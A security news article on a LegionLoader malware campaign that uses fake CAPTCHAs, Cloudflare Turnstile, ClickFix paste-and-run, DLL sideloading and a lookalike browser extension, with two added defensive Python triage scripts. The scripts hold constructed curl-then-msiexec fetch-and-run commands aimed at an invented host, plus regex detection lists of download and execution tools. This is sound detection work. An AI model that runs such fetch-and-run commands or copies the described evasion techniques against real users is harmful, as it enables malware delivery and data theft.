LegionLoader Delivered Through Fake CAPTCHAs and Abused Cloudflare Turnstile by Threat Actors

In a phishing and malware campaign first observed in February 2025, threat actors are using fake CAPTCHAs and Cloudflare's Turnstile challenge service to deliver the LegionLoader malware.

Netskope Threat Labs identified the campaign, which targets users who search for PDF documents on search engines and ends with the installation of a malicious browser extension that exfiltrates sensitive user data.

Infection Chain: Deceptive PDFs and Browser Notifications

The attack begins with victims searching for specific PDF documents. The search results lead them to compromised websites, from which they download PDF files that contain a fake CAPTCHA.

Figure: fake CAPTCHA embedded in the lure PDF.

When the user clicks the fake CAPTCHA, they are redirected through a genuine Cloudflare Turnstile challenge page and finally land on a page that asks for browser notification permission.

The chain only continues if the user allows browser notifications when prompted.

If the victim consents, a second CAPTCHA is displayed. This one instructs the user to open the Windows Run prompt (Win+R), paste the contents of the clipboard (which the page has already populated) and press Enter, the same paste-and-run trick used in other "ClickFix"-style lures.

The pasted command invokes the cURL utility (curl.exe ships with current Windows builds) to download a malicious MSI file. Opening or installing that MSI deploys the initial payload.
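The paste-and-run step leaves two artefacts a responder can check: the command itself is written to the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), and the resulting process is a shell or interpreter whose parent is explorer.exe. The following triage helper is an added example and is not code from Netskope or from the campaign; the RunMRU values and process events are constructed for the demonstration, and the indicator lists (download utilities, execution patterns) are the author's assumptions rather than signatures from the report. The hostname pdf-hosting.example is invented.

```python
"""Triage for the Win+R paste-and-run stage (added example, not from the report)."""
import re

# Built-in download utilities reachable from the Run dialog (author's list).
DOWNLOADERS = re.compile(
    r"\b(curl(\.exe)?|certutil(\.exe)?|bitsadmin(\.exe)?|"
    r"Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
    r"Start-BitsTransfer|mshta(\.exe)?)\b", re.IGNORECASE)

# Execution of what was just fetched: an MSI, an encoded PowerShell
# command, or a piped Invoke-Expression (author's list).
EXECUTORS = re.compile(
    r"(msiexec(\.exe)?|\.msi\b|powershell(\.exe)?\s+.*-(e|enc|encodedcommand)\b|"
    r"\|\s*iex\b|Invoke-Expression)", re.IGNORECASE)

# Images a pasted one-liner is launched through (author's list).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}


def is_clickfix_command(cmdline: str) -> bool:
    """True when a single command line both downloads something and runs it."""
    return bool(DOWNLOADERS.search(cmdline) and EXECUTORS.search(cmdline))


def runmru_commands(values: dict) -> list:
    """Return RunMRU commands, most recent first.

    MRUList is a string of letters; each letter names a value whose data is
    the typed command followed by a literal backslash and '1'.
    """
    cmds = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue
        cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds


def suspicious_run_dialog_events(events: list) -> list:
    """Flag interpreters spawned directly by explorer.exe (what a user pasting
    into Win+R looks like) whose command line fetches and runs a payload."""
    hits = []
    for ev in events:
        parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
        child = ev["Image"].lower().rsplit("\\", 1)[-1]
        if parent == "explorer.exe" and child in INTERPRETERS \
                and is_clickfix_command(ev["CommandLine"]):
            hits.append(ev)
    return hits


# Constructed RunMRU values; "c" is the most recent entry.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "cmd /c curl -s -o %TEMP%\\kvt.msi https://pdf-hosting.example/kvt.msi "
         "&& msiexec /qn /i %TEMP%\\kvt.msi\\1",
}

# Constructed process-creation events in the shape of Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c curl -s -o %TEMP%\\kvt.msi https://pdf-hosting.example/kvt.msi "
                    "&& msiexec /qn /i %TEMP%\\kvt.msi"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "CommandLine": "\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\""},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl -s -o C:\\Users\\u\\AppData\\Local\\Temp\\kvt.msi "
                    "https://pdf-hosting.example/kvt.msi"},
]

if __name__ == "__main__":
    for cmd in runmru_commands(SAMPLE_RUNMRU):
        print(("SUSPICIOUS " if is_clickfix_command(cmd) else "ok         ") + cmd)
    for ev in suspicious_run_dialog_events(SAMPLE_EVENTS):
        print("explorer.exe ->", ev["Image"], "|", ev["CommandLine"])
```

The third sample event (curl.exe spawned by cmd.exe) is deliberately not flagged by suspicious_run_dialog_events: it is the grandchild, and the parent relationship that identifies the Run dialog is explorer.exe -> cmd.exe. A real hunt would also look one level down, but the explorer.exe parent is the cheap, high-signal filter.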

The MSI registers an innocuous-looking application named "Kilo Verfair Tools" and carries entries in its CustomAction table that execute the malware during installation (the table can be inspected offline with an MSI editor such as Orca or the msitools msiinfo utility).

Figure: CustomAction table of the malicious MSI.

As part of the deception, launching the installed application opens SumatraPDF, a legitimate open-source PDF reader, which reinforces the illusion that the user has installed a harmless tool.

Meanwhile, in the background, the installer drops and executes a malicious DLL named "libcrypto-1_1-x64.dll", which starts the LegionLoader chain.

Loaded via DLL sideloading, this DLL decodes an encrypted blob that contains shellcode and the LegionLoader payload.

The payload is decrypted at run time with a custom algorithm that derives its keys dynamically, and the loader resolves Windows API calls through obfuscation rather than a static import table, both of which hinder analysis.

For evasion the loader uses API hammering (issuing large numbers of benign API calls to exhaust sandbox time budgets), then uses process hollowing to inject the decrypted payload into an "explorer.exe" process.

Multi-Stage Payload Execution via PowerShell

Once running, the LegionLoader payload contacts its command-and-control server, which responds with a PowerShell command that embeds obfuscated decryption routines.

After deobfuscation, the script downloads further payloads from URLs it assembles at run time, peeling back several layers of encryption and encoding to do so.

The next PowerShell stage installs a malicious browser extension named "Save to Google Drive", borrowing the name of the legitimate extension to avoid suspicion.

To deploy it, the script terminates running browser processes, modifies browser configuration and enables developer mode (which is what allows an unpacked extension from the local disk to be loaded), so that the extension is present in Chrome, Edge, Brave and Opera.

The extension requests broad permissions that let it intercept sensitive browser activity, including clipboard contents, cookies, browsing history and system details.

It also watches for Bitcoin-related activity, which suggests cryptocurrency transactions are a target.
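Two things make this extension stage checkable on a host: the permissions it declares in manifest.json, and the fact that it is loaded unpacked from a local directory rather than from the web store. The triage helper below is an added example and not code from Netskope or from the campaign. The manifest and the extensions.settings snippet (as found in a Chromium profile's Preferences / Secure Preferences file) are constructed to resemble what the article describes; the extension IDs and paths are made up. Treating location 4 as "unpacked, developer mode" and 8 as "loaded from the command line" follows the author's reading of Chromium's ManifestLocation enum and is an assumption, not something the report states.

```python
"""Triage of a sideloaded Chromium extension (added example, not from the report)."""
import json

# Permissions that, in combination, allow the data theft described
# in the article (author's selection, with a short reason for each).
HIGH_RISK = {
    "clipboardRead": "read clipboard contents",
    "cookies": "read session cookies",
    "history": "read browsing history",
    "tabs": "see the URL and title of every tab",
    "webRequest": "observe HTTP requests",
    "scripting": "inject scripts into pages",
    "system.cpu": "fingerprint the system",
    "system.memory": "fingerprint the system",
    "nativeMessaging": "talk to native binaries",
    "debugger": "attach to tabs via DevTools protocol",
}
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Chromium ManifestLocation values that mean "not from the web store".
# Assumption based on the Chromium source, not on the report.
SIDELOADED_LOCATIONS = {4: "unpacked (developer mode)", 8: "command line (--load-extension)"}


def triage_manifest(manifest_json: str) -> dict:
    """Score a manifest by high-risk permissions and all-sites host access."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    # MV2 manifests put host patterns in "permissions"; MV3 in "host_permissions".
    hosts = set(m.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    risky = sorted(p for p in perms if p in HIGH_RISK)
    all_sites = any(h in ALL_SITES for h in hosts)
    return {
        "name": m.get("name"),
        "risky_permissions": risky,
        "reasons": [HIGH_RISK[p] for p in risky],
        "all_sites": all_sites,
        "score": len(risky) + (2 if all_sites else 0),
    }


def sideloaded_extensions(prefs_json: str) -> list:
    """List extensions whose install location is unpacked or command-line."""
    prefs = json.loads(prefs_json)
    settings = prefs.get("extensions", {}).get("settings", {})
    found = []
    for ext_id, info in settings.items():
        how = SIDELOADED_LOCATIONS.get(info.get("location"))
        if how:
            found.append({
                "id": ext_id,
                "name": info.get("manifest", {}).get("name"),
                "path": info.get("path"),
                "loaded_via": how,
            })
    return found


# Constructed manifest mimicking the lookalike extension.
CONSTRUCTED_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Save to Google Drive",
    "version": "2.1.1",
    "permissions": ["clipboardRead", "cookies", "history", "tabs",
                    "scripting", "storage", "system.cpu"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
})

# Constructed extensions.settings fragment: one unpacked extension living
# in a user-writable temp directory, one normal store-installed extension.
CONSTRUCTED_PREFS = json.dumps({"extensions": {"settings": {
    "abcdefghijklmnopabcdefghijklmnop": {
        "location": 4,
        "path": "C:\\Users\\u\\AppData\\Local\\Temp\\gdrv",
        "manifest": {"name": "Save to Google Drive"},
    },
    "ponmlkjihgfedcbaponmlkjihgfedcba": {
        "location": 1,
        "path": "ponmlkjihgfedcbaponmlkjihgfedcba\\1.4.2_0",
        "manifest": {"name": "Some Store Extension"},
    },
}}})

if __name__ == "__main__":
    print(json.dumps(triage_manifest(CONSTRUCTED_MANIFEST), indent=2))
    for ext in sideloaded_extensions(CONSTRUCTED_PREFS):
        print("sideloaded:", ext)
```

A store-published extension with the same name would normally have location 1 and a path under the profile's Extensions directory; an entry with location 4 and a path under AppData\Local\Temp is the combination the article's deployment method would produce, and is worth an alert on its own even before the manifest is read.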

All collected data is exfiltrated to attacker-controlled servers.

The campaign has targeted organizations across North America, Asia, and Southern Europe, with a focus on the technology and financial services sectors.

According to the report, Netskope Threat Labs underscores the need for vigilance when accessing PDFs online.

Enterprises are advised to strengthen endpoint protection, enforce browser security policies (including controls over developer mode and unpacked extensions), and educate users about the risks of enabling browser notifications and of pasting commands into the Run prompt.

This campaign highlights the growing sophistication of threat actors who abuse legitimate technologies, such as CAPTCHA services and digitally signed applications, to evade detection and deliver targeted payloads.

As Netskope continues monitoring LegionLoader activity, organizations are urged to remain alert to emerging attack vectors.


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
